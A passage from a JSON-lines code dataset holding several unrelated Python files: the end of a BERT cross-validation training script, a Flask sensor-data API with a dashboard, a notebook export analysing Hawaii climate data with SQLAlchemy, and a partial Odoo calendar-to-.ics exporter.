args.model_type in [\"bert\", \"roberta\"]:\n # bert dim is 768.\n args.hidden_dim = (768 + args.ib_dim) // 2\n # sets the parameters of IB or MLP baseline.\n config.ib = args.ib\n config.activation = args.activation\n config.hidden_dim = args.hidden_dim\n config.ib_dim = args.ib_dim\n config.beta = args.beta\n config.sample_size = args.sample_size\n config.kl_annealing = args.kl_annealing\n config.deterministic = args.deterministic\n config.use_dropout = args.use_dropout\n return config\n\n\ndef get_train_loader(train_examples, tokenizer, labels, args):\n train_dataset = convert_examples(args, args.task_name, tokenizer, labels, train_examples)\n train_sampler = RandomSampler(train_dataset)\n train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)\n\n return train_dataloader\n\n\ndef get_test_loader(test_examples, tokenizer, labels, args):\n test_dataset = convert_examples(args, args.task_name, tokenizer, labels, test_examples)\n test_sampler = RandomSampler(test_dataset)\n test_dataloader = DataLoader(test_dataset, sampler=test_sampler, batch_size=args.eval_batch_size)\n\n return test_dataloader\n\n\ndef load_model(model_class, args, config, total_step):\n model = model_class.from_pretrained(args.model_name_or_path, config=config)\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0},\n ]\n if args.prior_weight_decay: # I am just addding this because revisiting bert few-sample added it. should be checked.\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon,\n correct_bias=True, weight_decay=args.weight_decay)\n else:\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\n\n if args.prior_weight_decay:\n optimizer = PriorWD(optimizer, use_prior_wd=args.prior_weight_decay)\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=args.warmup_steps,\n num_training_steps=total_step)\n if args.mixout > 0:\n from mixout import MixLinear\n for sup_module in model.modules():\n for name, module in sup_module.named_children():\n if isinstance(module, nn.Dropout):\n module.p = 0.0\n if isinstance(module, nn.Linear) and not ('output' in name and 'attention' not in name):\n target_state_dict = module.state_dict()\n bias = True if module.bias is not None else False\n new_module = MixLinear(\n module.in_features, module.out_features, bias, target_state_dict[\"weight\"], args.mixout\n ).to(args.cuda)\n new_module.load_state_dict(target_state_dict)\n setattr(sup_module, name, new_module)\n return model, optimizer, scheduler\n\n\ndef compute_metrics(out_label_ids, preds_label):\n result = {\n 'f1': f1_score(y_true=out_label_ids, y_pred=preds_label, average='macro'),\n 'recall': recall_score(y_true=out_label_ids, y_pred=preds_label, average='macro'),\n 'precision': precision_score(out_label_ids, preds_label, average='macro'),\n 'acc': accuracy_score(out_label_ids, preds_label)\n }\n return result\n\n\ndef main(args, results, seed):\n args.output_mode = output_modes[args.task_name]\n args.model_type = args.model_type.lower()\n args.train_batch_size = args.per_gpu_train_batch_size\n args.eval_batch_size = args.per_gpu_eval_batch_size\n processor = processors[args.task_name](args.task_to_data_dir[args.task_name])\n label_list = processor.get_labels()\n _, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]\n tokenizer = tokenizer_class.from_pretrained(\n args.tokenizer_name if args.tokenizer_name else args.model_name_or_path\n )\n config = get_config(args)\n kfold = KFold(n_splits=args.n_splits, shuffle=True, random_state=seed)\n examples = processor.get_examples()\n splits = kfold.split(examples)\n for n_split, (train_indices, valid_indices) in enumerate(splits):\n logger.info(\"run fold {}\".format(n_split))\n train_examples = collection(examples, train_indices)\n val_examples = collection(examples, valid_indices)\n train_dataloader = get_train_loader(train_examples, tokenizer, processor.get_labels(), args)\n model, optimizer, scheduler = load_model(model_class, args, config,\n len(train_dataloader) * args.num_train_epochs)\n model.to(args.device)\n model.zero_grad()\n for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"):\n tr_loss = 0.0\n train_step = 0\n for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n model.train()\n batch = tuple(t.to(args.device) for t in batch)\n inputs = {\"input_ids\": batch[0], \"attention_mask\": batch[1], \"labels\": batch[3]}\n if args.model_type != \"distilbert\":\n inputs[\"token_type_ids\"] = (\n batch[2] if args.model_type in [\"bert\", \"xlnet\", \"albert\"] else None\n ) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids\n outputs = model(**inputs, epoch=epoch)\n loss = outputs[\"loss\"][\"loss\"] # model outputs are always tuple in transformers (see doc)\n loss.backward()\n tr_loss += loss.item()\n optimizer.step()\n scheduler.step() # Update learning rate schedule\n model.zero_grad()\n train_step += 1\n\n eval_dataloader = get_test_loader(val_examples, tokenizer, label_list, args)\n # Eval!\n eval_loss = 0.0\n nb_eval_steps = 0\n ce_loss = 0.0\n preds = None\n out_label_ids = None\n for batch in tqdm(eval_dataloader, desc=\"Evaluating\"):\n model.eval()\n batch = tuple(t.to(args.device) for t in batch)\n\n with torch.no_grad():\n inputs = {\"input_ids\": batch[0], \"attention_mask\": batch[1], \"labels\": batch[3]}\n if args.model_type != \"distilbert\":\n inputs[\"token_type_ids\"] = (\n batch[2] if args.model_type in [\"bert\", \"xlnet\", \"albert\"] else None\n ) # XLM, DistilBERT, RoBERTa, and XLM-RoBERTa don't use segment_ids\n outputs = model(**inputs, sampling_type=\"argmax\")\n tmp_eval_loss, logits = outputs[\"loss\"]['loss'], outputs[\"logits\"]\n if 'ce_loss' in outputs[\"loss\"]:\n ce_loss += outputs[\"loss\"]['ce_loss'].mean().item()\n else:\n ce_loss += tmp_eval_loss.mean().item()\n eval_loss += tmp_eval_loss.mean().item()\n nb_eval_steps += 1\n if preds is None:\n preds = logits.detach().cpu().numpy()\n out_label_ids = inputs[\"labels\"].detach().cpu().numpy()\n else:\n preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)\n out_label_ids = np.append(out_label_ids, inputs[\"labels\"].detach().cpu().numpy(), axis=0)\n\n eval_loss = eval_loss / nb_eval_steps\n preds_label = np.argmax(preds, axis=1)\n metrics_result = compute_metrics(out_label_ids, preds_label)\n metrics_result['train_loss'] = tr_loss / train_step\n metrics_result['eval_loss'] = eval_loss\n metrics_result['epoch'] = epoch\n metrics_result['fold'] = n_split\n metrics_result['seed'] = seed\n metrics_result['ce_loss'] = ce_loss / nb_eval_steps\n logger.info(metrics_result)\n if results is None:\n results = pd.DataFrame(metrics_result, columns=metrics_result.keys(), index=[0])\n else:\n results = results.append(metrics_result, ignore_index=True)\n results.to_csv(args.output, index=False)\n return results\n\n\nif __name__ == \"__main__\":\n args = get_args()\n\n results = None\n for seed in args.seeds:\n set_seed(seed)\n results = main(args, results, seed)\n","repo_name":"little-pikachu-hash/VIBCodeBERT","sub_path":"run_glue_cross.py","file_name":"run_glue_cross.py","file_ext":"py","file_size_in_byte":17876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14564361108","text":"#Flask is a microframework for Python that handles web requests according to the WSGI protocol using WSGI library Werkzeug\n#SQLAlchemy is an SQL Toolkit and ORM for Python, Flask-SQLAlchemy is a Flask extension that appends SQLAlchemy onto Flask \n#Flask_CORS allows us to set our Cross Origin Resource Sharing HTTP header values so that we can run this demo locally \n#Marshmallow is a convenient way to deserialize data (like SQLAlchemy objects) \n\nfrom flask import Flask, render_template, request, redirect, jsonify, make_response, abort\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom marshmallow_sqlalchemy import SQLAlchemyAutoSchema\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n#Flask-SQLAlchemy loads configuration keys from Flask, so you set Flask-SQLAlchemy configuraiton keys with Flask's app.config\n#Here we tell Flask-SQLAlchemy where to find the database and what engine to use when interacting with it \n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///solution.db'\ndb = SQLAlchemy(app)\nCORS(app)\n\n#I'm going to normalise the data minimally, organising it into two tables, one for sensors and one for sensor data\nclass Sensors(db.Model):\n __tablename__ = 'Sensors'\n id = db.Column(db.String(128), primary_key=True)\n location = db.Column(db.String(128))\n region = db.Column(db.String(128))\n country = db.Column(db.String(128))\n date_created = db.Column(db.DateTime, default = datetime.utcnow)\n\nclass SensorData(db.Model):\n __tablename__ = 'SensorData'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n sensor_id = db.Column(db.String(128), nullable=False)\n date_time = db.Column(db.DateTime, default=datetime.utcnow)\n temperature = db.Column(db.Integer)\n humidity = db.Column(db.Integer)\n wind_speed = db.Column(db.Integer)\n wind_direction = db.Column(db.String(3))\n precipitation_type = db.Column(db.String(24))\n precipitation_rate = db.Column(db.Integer)\n\n#If the database already exists db.create_all() won't do anything, but otherwise it will create the database referenced at SQLALCHEMY_DATABASE_URI\nwith app.app_context():\n db.create_all()\n\n#To deserialize SQLALchemy query results concisely I'm going to use marshmallow_sqlalchemy's SQLAlchemyAutoSchema\nclass SensorSchema(SQLAlchemyAutoSchema):\n class Meta:\n model = Sensors\n load_instance = True\n \nclass SensorDataSchema(SQLAlchemyAutoSchema):\n class Meta:\n model = SensorData\n load_instance = True\n\n\n#API ROOT-----------------------------------------------------------\n@app.route('/api', methods=['GET'])\ndef api_root():\n \n #Load in our marshmallow schema\n sensor_schema = SensorSchema()\n sensor_data_schema = SensorDataSchema()\n #Query our database\n sensors = Sensors.query.order_by(Sensors.date_created).all()\n sensor_data = SensorData.query.order_by(SensorData.date_time).all()\n \n #Deserialise query results and store them in a list \n sensors_list = []\n for sensor in sensors:\n sensor_dump = sensor_schema.dump(sensor)\n sensors_list.append(sensor_dump)\n \n sensor_data_list = []\n for data in sensor_data:\n sensor_data_dump = sensor_data_schema.dump(data)\n sensor_data_list.append(sensor_data_dump)\n\n #Compile lists to dict\n response = {\"Sensors\": sensors_list, \"Sensor Data\": sensor_data_list}\n #Make response\n return make_response(str(response), 200)\n\n#SENSORS API---------------------------------------------------------\n@app.route('/api/sensors', methods=['GET', 'POST', 'DELETE'])\ndef sensors():\n\n if request.method == 'GET':\n\n #Load in our marshmallow schema\n sensor_schema = SensorSchema()\n #Query our database\n sensors = Sensors.query.order_by(Sensors.date_created).all()\n #Deserialise query results and store them in a list\n sensors_list = []\n for sensor in sensors:\n sensor_dump = sensor_schema.dump(sensor)\n sensors_list.append(sensor_dump)\n #Make response\n return make_response(str(sensors_list), 200)\n \n \n if request.method == 'POST':\n \n #Load the request body as a dict\n data = request.values\n id = data['id']\n location = data['location']\n region = data['region']\n country = data['country']\n \n #Check that the id doesn't already exist in the table\n #If it does, return a 403 (Forbidden)\n id_exists = db.session.query(db.session.query(Sensors).filter_by(id=id).exists()).scalar()\n if id_exists == True:\n abort(403)\n \n #Otherwise, as all other fields are nullable other data is valid\n new_sensor = Sensors(id=id, location=location, region=region, country=country)\n\n #Commit to db and return success code\n try:\n db.session.add(new_sensor)\n db.session.commit()\n return make_response('Success', 201)\n except Exception as e:\n #Or return failure\n return make_response('Exception returned attempting to add new sensor: ' + str(e), 500)\n\n\n if request.method == 'DELETE':\n \n #Load the request data to find the id\n data = request.values\n id_to_drop = data['id']\n\n #Find the object with corresponding id in the table\n sensor = Sensors.query.get_or_404(id_to_drop)\n\n #Delete it and return success\n try:\n db.session.delete(sensor)\n db.session.commit()\n return make_response(jsonify('Success'), 200)\n except Exception as e: \n #Or return failure\n return make_response(jsonify('Failed to delete sensor via API: ' + str(e)), 500)\n\n#SENSOR DATA API--------------------------------------------------------\n@app.route('/api/data', methods=['GET', 'POST', 'DELETE'])\ndef sensor_data():\n\n if request.method == 'GET':\n #Load Marshmallow schema\n sensor_data_schema=SensorDataSchema()\n #Query Database\n sensor_data = SensorData.query.order_by(SensorData.date_time).all()\n #Deserialise query results and store in list\n sensor_data_list = []\n for data in sensor_data:\n sensor_data_dump = sensor_data_schema.dump(data)\n sensor_data_list.append(sensor_data_dump)\n return make_response(str(sensor_data_list), 200)\n \n if request.method == 'POST':\n \n #Load the request body as a dict\n data = request.values\n\n #All sensor data POST requests MUST have a sensor_id that corresponds to an existing sensor\n #So we're going to check that here\n sensor_id = data['sensor_id']\n\n sensor_id_exists = db.session.query(db.session.query(Sensors).filter_by(id=sensor_id).exists()).scalar()\n if sensor_id_exists == False:\n abort(403)\n\n temperature = data['temperature']\n humidity = data['humidity']\n wind_speed = data['wind-speed']\n wind_direction = data['wind-direction']\n precipitation_type = data['precipitation-type']\n precipitation_rate = data['precipitation-rate']\n new_sensor_data = SensorData(sensor_id=sensor_id, temperature=temperature, humidity=humidity, wind_speed=wind_speed, wind_direction=wind_direction, precipitation_type=precipitation_type, precipitation_rate=precipitation_rate)\n \n #Commit to db and return success code\n try: \n db.session.add(new_sensor_data)\n db.session.commit()\n return make_response(jsonify('Success'),201)\n except Exception as e:\n #Or return failure\n return make_response(jsonify('Exception returned attempting to add new sensor data: ' + str(e)), 500)\n\n if request.method == 'DELETE':\n \n #Load the request data to find the id\n data = request.values\n id_to_drop = data['id']\n\n #Find the object with the corresponding id in the table\n sensor_data = SensorData.query.get_or_404(id_to_drop)\n\n #Delete it and return success\n try:\n db.session.delete(sensor_data)\n db.session.commit()\n return make_response(jsonify('Success'), 200)\n except Exception as e: \n return make_response(jsonify('Exception returned attempting to delete sensor data entry: ' + str(e)), 500)\n\n#QUERY API---------------------------------------------------------------\n#api/query request must inlcude 5 parameters: metric1 (calculation), metric2 (metric), location, time_from, and time_to\n@app.route('/api/query', methods=['GET'])\ndef respondToQuery():\n \n #request.args can read the arguments passed to a url by a HTTP request\n metric1 = request.args.get('metric1')\n metric2 = request.args.get('metric2')\n location = request.args.get('location')\n time_from = request.args.get('from')\n time_to = request.args.get('to')\n \n #populate list of all sensors\n sensors = Sensors.query.all()\n\n #check which ones are located in the region specified by the query\n local_sensors = []\n for sensor in sensors:\n if location in sensor.region.lower() or location in sensor.country.lower():\n local_sensors.append(sensor.id)\n\n #Now we can query to see what sensor data entries are within the user set time period\n in_period_entries = SensorData.query.filter(SensorData.date_time.between(time_from, time_to)).all()\n \n #Now let's see which sensor data entries come from local sensors in the time period set\n valid_entries = []\n for data in in_period_entries:\n if data.sensor_id in local_sensors:\n valid_entries.append(data)\n\n #Now we can calculate whatever metric the user has requested\n values = []\n for entry in valid_entries:\n if metric2 == 'temp':\n values.append(entry.temperature)\n if metric2 == 'humidity':\n values.append(entry.humidity)\n if metric2 == 'wind-speed':\n values.append(entry.wind_speed)\n if metric2 == 'precipitation':\n values.append(entry.precipitation)\n \n if metric1 == 'max':\n return make_response(str(max(values)), 200)\n if metric1 == 'min':\n return make_response(str(min(values)), 200)\n if metric1 == 'mean':\n return make_response(str(sum(values) / len(values)), 200)\n\n\n#DASHBOARD STUFF ---------------------------------------------------------------------------------------------------------------------\n#Accessing root will return a dashboard showing the information in the server at any given time\n@app.route('/')\ndef index():\n sensors = Sensors.query.order_by(Sensors.date_created).all()\n sensor_data = SensorData.query.order_by(SensorData.date_time).all()\n return render_template('index.html', sensors=sensors, sensor_data=sensor_data)\n\n#Passing index() an error will create an error box at the top of the page\ndef index(error):\n sensors = Sensors.query.order_by(Sensors.date_created).all()\n sensor_data = SensorData.query.order_by(SensorData.date_time).all()\n error = error\n return render_template('index.html', sensors=sensors, sensor_data=sensor_data, error=error)\n\n#You can add additional sensors from the dashboard with a HTML form\n@app.route('/sensors', methods=['POST'])\ndef dash_sensors(): \n #We can't have duplicate primary keys in the Sensors table, let's catch that and display an error in-page\n #if a user tries to use an existing sensor-id\n id = request.form['sensor-id']\n idExists = db.session.query(db.session.query(Sensors).filter_by(id=id).exists()).scalar()\n if idExists == True:\n return index(\"ERROR: Sensor ID '\" + id + \"' already in use\")\n \n location = request.form['sensor-location']\n region = request.form['sensor-region']\n country = request.form['sensor-country']\n new_sensor = Sensors(id=id, location=location, region=region, country=country)\n try: \n db.session.add(new_sensor)\n db.session.commit()\n return redirect('/')\n except Exception as e:\n return 'Exception returned attempting to add new sensor: ' + str(e)\n\n#You can remove sensors from the dashboard too, although it's implemented with a GET and not a drop\n@app.route('/delete-sensor/', methods=['GET'])\ndef dash_deleteSensor(id):\n #I've implemented the delete links hastily by \n sensor = Sensors.query.get_or_404(id)\n try:\n db.session.delete(sensor)\n db.session.commit()\n return redirect('/')\n except Exception as e: \n return index('Exception returned attempting to delete sensor: ' + str(e))\n\n#You can add additional sensor data from the dashboard with a HTML form\n@app.route('/data', methods=['POST'])\ndef dash_data():\n #We need to check that a sensor exists under a given ID for the data input to be valid\n #sensor data is assigned an ID and DateTime on construction\n sensor_id = request.form['sensor-id']\n idExists = db.session.query(db.session.query(Sensors).filter_by(id=sensor_id).exists()).scalar()\n if idExists == False:\n return index(\"ERROR: Sensor '\" + sensor_id + \"' not found.\")\n temperature = request.form['temp']\n humidity = request.form['humidity']\n wind_speed = request.form['wind']\n wind_direction = request.form['wind-dir']\n precipitation_type = request.form['precip']\n precipitation_rate = request.form['precip-q']\n new_data = SensorData(sensor_id=sensor_id, temperature=temperature, humidity=humidity, wind_speed=wind_speed, wind_direction=wind_direction, precipitation_rate=precipitation_rate, precipitation_type=precipitation_type)\n\n try:\n db.session.add(new_data)\n db.session.commit()\n return redirect('/')\n except Exception as e:\n return index('Exception returned attempting to add new sensor data ' + str(e))\n\n#You can remove sensor data from the dashboard too, although it's implemented with a GET and not a drop\n@app.route('/delete-data/', methods=['GET'])\ndef dash_delete_data(id):\n sensor_data = SensorData.query.get_or_404(id)\n try:\n db.session.delete(sensor_data)\n db.session.commit()\n return redirect('/')\n except Exception as e: \n return index('Exception returned attempting to delete data: ' + str(e))\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"TadghW/psychic-winner","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":14320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20816752389","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# %matplotlib inline\nfrom matplotlib import style\nstyle.use('fivethirtyeight')\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\n\n\n# In[3]:\n\n\nimport datetime as dt\nfrom datetime import datetime, timedelta\nfrom pprint import pprint\n\n\n# # Reflect Tables into SQLAlchemy ORM\n\n# In[4]:\n\n\n# Python SQL toolkit and Object Relational Mapper\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nfrom sqlalchemy import inspect\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Float\nfrom sqlalchemy.types import Date\n\n\n# In[5]:\n\n\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n\n# In[6]:\n\n\n# reflect an existing database into a new model\nbase = automap_base()\n# reflect the tables\nbase.prepare(engine, reflect = True)\n\n\n# In[7]:\n\n\n# We can view all of the classes that automap found\nbase.classes.keys()\n# https://www.learnpython.org/en/Classes_and_Objects (understand difference between object and classes)\n\n\n# In[8]:\n\n\n# Save references to each table\nmeasurement = base.classes.measurement\nstation = base.classes.station\nstation\n\n\n# In[9]:\n\n\n# Create our session (link) from Python to the DB\nsession = Session(bind=engine)\nsession\n\n\n# # Exploratory Climate Analysis\n\n# In[10]:\n\n\ncmd = \"\"\"SELECT date\nFROM measurement\n\"\"\"\nprint(pd.read_sql(cmd, con=engine))\n\n\n# Design a query to retrieve the last 12 months of precipitation data and plot the results\n\n\n# # Calculate the date 1 year ago from the last data point in the database\n\n# # Perform a query to retrieve the data and precipitation scores\n\n# # Save the query results as a Pandas DataFrame and set the index to the date column\n\n# # Sort the dataframe by date\n\n# # Use Pandas Plotting with Matplotlib to plot the data\n\n\n# In[11]:\n\n\nlast_date = session.query(func.max(measurement.date)).first()[0]\nprint(\"The last day data was collected was: \" + last_date)\n\n\n# In[12]:\n\n\ntype(last_date)\n\n\n# In[13]:\n\n\ndate_time_obj = dt.datetime.strptime(last_date, '%Y-%m-%d')\ndate_time_obj\n\n\n# In[14]:\n\n\ntype(date_time_obj)\n# convert this one to datetime.delta for te\n\n\n# In[15]:\n\n\ntype(dt.timedelta(days=365))\n\n\n# In[16]:\n\n\n# # Calculate the date 1 year ago from the last data point in the database\none_year_ago = date_time_obj - timedelta(days=365)\nprint(\"The last year of data collection began: \" + str(one_year_ago))\n\n\n# In[17]:\n\n\none_year_ago_query = session.query(measurement).filter(measurement.date >= one_year_ago, measurement.date <= last_date)\none_year_ago_query\n\n\n# In[18]:\n\n\nlast_year_df = pd.read_sql(one_year_ago_query.statement, one_year_ago_query.session.bind)\nprint(\"This dataframe includes the last year of data via multiple session queries : \")\nlast_year_df\n\n\n# In[19]:\n\n\n# # Perform a query to retrieve the data and precipitation scores\n# # Save the query results as a Pandas DataFrame and set the index to the date column\n# # Sort the dataframe by date\nprcp_data_df = pd.read_sql(\"SELECT date, prcp FROM measurement WHERE date > '2016-08-23'\", con=engine)\nprint(\"This dataframe includes the last year of data from via single line query: \")\nprcp_data_df\n\n\n# ## Use Pandas Plotting with Matplotlib to plot the data\n\n# In[20]:\n\n\nprcp_data_df.plot(\"date\", \"prcp\", rot=90, figsize=(10,6), title=\"Precipitation for last 12 months\")\nplt.xticks()\nplt.xlabel(\"Inches\")\nplt.ylabel(\"Temp\")\nplt.tight_layout()\nplt.savefig(\"images/12_mo_prcp.png\")\n\n\n# In[21]:\n\n\n# Use Pandas to calcualte the summary statistics for the precipitation data\nprcp_summary = prcp_data_df[[\"prcp\"]].describe()\nprint(\"The summary of precip data from the last year is: \") \nprcp_summary\n\n\n# In[22]:\n\n\n# Design a query to show how many stations are available in this dataset?\nstation_count = session.query(station).count()\nstation_count\n\n\n# In[23]:\n\n\n# What are the most active stations? (i.e. what stations have the most rows)?\n# List the stations and the counts in descending order.\nactivity_count = (session.query(measurement.station, func.count(measurement.date)).group_by(measurement.station).order_by(func.count(measurement.date).desc()).all())\nprint(\"This is the activity count: \")\npprint(activity_count)\n\n\n# In[24]:\n\n\nactive_stations_df = pd.DataFrame(activity_count, columns=[\"Station\", \"Measurement Count\"], )\nactive_stations_df\n\n\n# In[25]:\n\n\nmost_active = (session.query(measurement.station, func.count(measurement.date)).group_by(measurement.station).order_by(func.count(measurement.date).desc()).first())\nprint(most_active)\n\n\n# In[26]:\n\n\n# Using the station id from the previous query, calculate the lowest temperature recorded, \n# highest temperature recorded, and average temperature of the most active station?\nmost_active = session.query(measurement.station, station.name, \n func.min(measurement.tobs),\n func.max(measurement.tobs), \n func.avg(measurement.tobs)).filter(measurement.station == 'USC00519281')\n\npd.DataFrame(most_active, columns=[\"Station\", \"Station Name\", \"min-temp\", \"max-temp\", \"avg-temp\"])\n\n\n# In[ ]:\n\n\n\n\n\n# In[27]:\n\n\n# Choose the station with the highest number of temperature observations.\n# Query the last 12 months of temperature observation data for this station and plot the results as a histogram\nmost_active_last12 = session.query(measurement.date, measurement.tobs).filter(measurement.station == 'USC00519281').filter(measurement.date >= one_year_ago, measurement.date <= last_date)\n\nmost_active_last12_df = pd.DataFrame(most_active_last12, columns=[\"date\", \"temp\"])\nmost_active_last12_df\n\n\n# In[28]:\n\n\n\nmost_active_last12_df.plot.hist(\"tobs\", bins=12)\nplt.title(\"12 month tobs for most active station\")\nplt.savefig(\"images/12_mo_histogram.png\")\n\n\n# ## Bonus Challenge Assignment\n\n# In[30]:\n\n\n# This function called `calc_temps` will accept start date and end date in the format '%Y-%m-%d' \n# and return the minimum, average, and maximum temperatures for that range of dates\ndef calc_temps(start_date, end_date):\n \"\"\"TMIN, TAVG, and TMAX for a list of dates.\n \n Args:\n start_date (string): A date string in the format %Y-%m-%d\n end_date (string): A date string in the format %Y-%m-%d\n \n Returns:\n TMIN, TAVE, and TMAX\n \"\"\"\n \n return session.query(func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs)). filter(measurement.date >= start_date).filter(measurement.date <= end_date).all()\n\n# function usage example\nprint(calc_temps('2012-02-28', '2012-03-05'))\n\n\n# In[32]:\n\n\n# Use your previous function `calc_temps` to calculate the tmin, tavg, and tmax \n# for your trip using the previous year's data for those same dates.\ntrip_calc = calc_temps('2016-08-24', '2017-08-18')\nprint(trip_calc)\n\n\n# In[48]:\n\n\n# Plot the results from your previous query as a bar chart. \n# Use \"Trip Avg Temp\" as your Title\n# Use the average temperature for the y value\n# Use the peak-to-peak (tmax-tmin) value as the y error bar (yerr)\n\n\n# In[49]:\n\n\n# Calculate the total amount of rainfall per weather station for your trip dates using the previous year's matching dates.\n# Sort this in descending order by precipitation amount and list the station, name, latitude, longitude, and elevation\n\n\n# In[51]:\n\n\n# Create a query that will calculate the daily normals \n# (i.e. the averages for tmin, tmax, and tavg for all historic data matching a specific month and day)\n\ndef daily_normals(date):\n \"\"\"Daily Normals.\n \n Args:\n date (str): A date string in the format '%m-%d'\n \n Returns:\n A list of tuples containing the daily normals, tmin, tavg, and tmax\n \n \"\"\"\n \n sel = [func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs)]\n return session.query(*sel).filter(func.strftime(\"%m-%d\", measurement.date) == date).all()\n \ndaily_normals(\"01-01\")\n\n\n# In[ ]:\n\n\n# calculate the daily normals for your trip\n# push each tuple of calculations into a list called `normals`\n\n# Set the start and end date of the trip\n\n# Use the start and end date to create a range of dates\n\n# Stip off the year and save a list of %m-%d strings\n\n# Loop through the list of %m-%d strings and calculate the normals for each date\n\n\n# In[ ]:\n\n\n# Load the previous query results into a Pandas DataFrame and add the `trip_dates` range as the `date` index\n\n\n# In[ ]:\n\n\n# Plot the daily normals as an area plot with `stacked=False`\n\n\n# In[ ]:\n\n## Flask API\nfrom flask import Flask, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime\nimport os\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef main():\n\treturn \"Thesea are the available routes\"\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\n\n","repo_name":"Yanwho/sqlalchemy-challenge","sub_path":".ipynb_checkpoints/app-checkpoint.py","file_name":"app-checkpoint.py","file_ext":"py","file_size_in_byte":8815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3882618589","text":"import base64\nimport cStringIO\nimport contextlib\nimport csv\nimport datetime\nimport pytz\n\nfrom odoo import models, fields, api\n\n\nclass DownloadContact(models.Model):\n _inherit = 'calendar.event'\n file_name = fields.Char()\n data = fields.Binary(string=\"File\", readonly=True)\n\n @api.multi\n def download(self):\n if self.id:\n with contextlib.closing(cStringIO.StringIO()) as buf:\n tz = pytz.timezone(self.env.user.tz) if self.env.user.tz else pytz.utc\n if self.start_datetime:\n start_datetime = self._convert_datetime_format(self.start_datetime)\n else:\n start_datetime=''\n if self.start_date:\n start_date = self._convert_date_format(self.start_date)\n else:\n start_date=''\n if self.stop_datetime:\n stop_datetime = self._convert_datetime_format(self.stop_datetime)\n else:\n stop_datetime=''\n if self.stop_date:\n stop_date = self._convert_date_format(self.stop_date)\n else:\n stop_date = ''\n if self.create_date:\n create_date = self._convert_datetime_format(self.create_date)\n else:\n create_date = self._convert_date_format(datetime.datetime.now())\n if self.start:\n start = self._convert_datetime_format(self.start)\n else:\n start =''\n if self.privacy =='public':\n method = 'PUBLISH'\n elif self.privacy =='private':\n method = 'REQUEST'\n elif self.privacy =='confidential':\n method ='REQUEST'\n\n writer = csv.writer(buf, delimiter=\":\", quotechar='\"')\n writer.writerow((\"BEGIN\", \"VCALENDAR\"))\n writer.writerow((\"VERSION\", \"2.0\"))\n writer.writerow((\"PRODID\", '-//magestore.vn//Calendar 1.0//EN'))\n writer.writerow((\"CALSCALE\", \"GREGORIAN\"))\n\n writer.writerow((\"BEGIN\", \"VEVENT\" ))\n writer.writerow((\"X-WR-CALNAME\", self.user_id.name.encode('utf8') if self.user_id.name else ''))\n writer.writerow((\"X-WR-TIMEZONE\", tz if tz else ''))\n writer.writerow((\"METHOD\", method))\n writer.writerow((\"DTSTART\", start_datetime if start_datetime else start_date))\n writer.writerow((\"DTEND\", stop_datetime if stop_datetime else stop_date ))\n writer.writerow((\"DTSTAMP\", start))\n writer.writerow((\"UID\", self.user_id.id if self.user_id.id else ''))\n writer.writerow((\"CREATED\", create_date))\n writer.writerow((\"DESCRIPTION\", self.description.encode('utf-8') if self.description else ''))\n writer.writerow((\"LAST-MODIFIED\", create_date))\n writer.writerow((\"LOCATION\", self.location.encode('utf-8') if self.location else ''))\n writer.writerow((\"SEQUENCE\", 0))\n writer.writerow((\"STATUS\", self.state.upper()))\n writer.writerow((\"SUMMARY\", self.name.encode('utf-8').upper() ))\n\n writer.writerow((\"TRANSP\", 'OPAQUE' ))\n writer.writerow((\"END\", 'VEVENT' ))\n writer.writerow((\"END\", 'VCALENDAR' ))\n\n out = base64.encodestring(buf.getvalue())\n self.write({\n 'data': out,\n 'file_name': self.name + '.ics'\n })\n\n compose_form = self.env.ref('calendar_exp.wizard_export_calendar')\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'calendar.event',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'views': [(compose_form.id, 'form')],\n 'view_id': compose_form.id,\n 'target': 'new',\n }\n\n def _convert_date_format(self, s):\n s = s.replace('-', '')\n s += \"T000000\"\n return s\n\n def _convert_datetime_format(self,s):\n s = s.replace('-', '')\n s = s.replace(':', '')\n s = s.replace(' ', 'T')\n return 